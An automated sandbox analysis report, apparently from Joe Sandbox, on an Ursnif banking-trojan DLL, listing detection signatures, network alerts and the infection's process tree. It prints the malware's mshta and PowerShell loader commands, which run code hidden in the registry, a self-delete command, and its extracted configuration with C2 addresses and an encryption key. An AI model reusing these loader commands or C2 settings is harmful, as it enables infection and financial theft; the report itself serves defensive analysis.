Edit tour
Windows
Analysis Report
nhLAwAo49f
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Suspicious Remote Thread Created
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Classification
- System is w10x64
- loaddll32.exe (PID: 6740 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\nhL AwAo49f.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 6748 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\nhL AwAo49f.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 6768 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\nhLA wAo49f.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 5304 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - explorer.exe (PID: 684 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 3616 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\nhLAwAo4 9f.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 1348 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 4028 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 3808 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5) - cmd.exe (PID: 6232 cmdline:
cmd /C "ns lookup myi p.opendns. com resolv er1.opendn s.com > C: \Users\use r\AppData\ Local\Temp \F5DD.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - rundll32.exe (PID: 6472 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L -h MD5: 73C519F050C20580F8A62C849D49215A) - WerFault.exe (PID: 6844 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 740 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 7020 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 740 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 4992 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 740 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 5520 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Ftlo='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Ftlo).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6092 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name pfem rdpi -valu e gp; new- alias -nam e ndgrwui -value iex ; ndgrwui ([System.T ext.Encodi ng]::ASCII .GetString ((pfemrdpi "HKCU:Sof tware\AppD ataLow\Sof tware\Micr osoft\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E").UrlsR eturn)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 588 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 4572 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\f2vxj03 f\f2vxj03f .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 5316 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESFC15.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\f2v xj03f\CSCE 6C104441B8 4417C9AABF 578684269B 5.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 3108 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\ci1gjuu 1\ci1gjuu1 .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 3204 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES319C.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\ci1 gjuu1\CSCF DAADE721EC 5455F89368 A25D31BABA B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Click to see the 21 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: juju4, Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Timestamp: | 04/22/22-18:13:04.407179 04/22/22-18:13:04.407179 |
SID: | 2033203 |
Source Port: | 49773 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-18:12:43.292918 04/22/22-18:12:43.292918 |
SID: | 2033203 |
Source Port: | 49758 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-18:13:05.383399 04/22/22-18:13:05.383399 |
SID: | 2033204 |
Source Port: | 49773 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-18:13:03.616504 04/22/22-18:13:03.616504 |
SID: | 2033203 |
Source Port: | 49773 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_04893072 |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_00B5591B |
Source: | Code function: | 2_2_00B55A14 | |
Source: | Code function: | 2_2_00B5FCC0 | |
Source: | Code function: | 2_2_00B5CE21 |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | Process created: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | ASN Name: |
Source: | IP Address: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_04894CC6 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: |
Source: | Code function: | 2_2_04893072 |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Process created: |
Source: | Code function: | 2_2_0489821C | |
Source: | Code function: | 2_2_0489198A | |
Source: | Code function: | 2_2_0489475F | |
Source: | Code function: | 2_2_00B6C3A9 | |
Source: | Code function: | 2_2_00B70B0E | |
Source: | Code function: | 2_2_00B684D9 | |
Source: | Code function: | 2_2_00B51E50 | |
Source: | Code function: | 2_2_00B58FA6 | |
Source: | Code function: | 2_2_00B737F4 |
Source: | Code function: | 2_2_00B6488B |
Source: | Key opened: | Jump to behavior |
Source: | Section loaded: | Jump to behavior |
Source: | Static PE information: |
Source: | Code function: | 2_2_04893A9C | |
Source: | Code function: | 2_2_04894695 | |
Source: | Code function: | 2_2_048925D7 | |
Source: | Code function: | 2_2_04898441 | |
Source: | Code function: | 2_2_00B6312E | |
Source: | Code function: | 2_2_00B712F1 | |
Source: | Code function: | 2_2_00B594A5 | |
Source: | Code function: | 2_2_00B644A5 | |
Source: | Code function: | 2_2_00B65CA1 | |
Source: | Code function: | 2_2_00B51C78 | |
Source: | Code function: | 2_2_00B6AD9E | |
Source: | Code function: | 2_2_00B65D9D | |
Source: | Code function: | 2_2_00B6F5FF | |
Source: | Code function: | 2_2_00B5DDDD | |
Source: | Code function: | 2_2_00B6B628 | |
Source: | Code function: | 2_2_00B5CF88 | |
Source: | Code function: | 2_2_00B5A085 | |
Source: | Code function: | 2_2_00B65830 | |
Source: | Code function: | 2_2_00B529B2 | |
Source: | Code function: | 2_2_00B65188 | |
Source: | Code function: | 2_2_00B6C1C2 | |
Source: | Code function: | 2_2_00B57A1E | |
Source: | Code function: | 2_2_00B51B92 | |
Source: | Code function: | 2_2_00B6264B |
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: |
Source: | Code function: | 2_2_04896DB6 |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_0489B301 | |
Source: | Code function: | 2_2_0489821B | |
Source: | Code function: | 2_2_04897E29 | |
Source: | Code function: | 2_2_00B732B9 | |
Source: | Code function: | 2_2_00B62C1B | |
Source: | Code function: | 2_2_00B737F3 |
Source: | Code function: | 2_2_00B5A513 |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
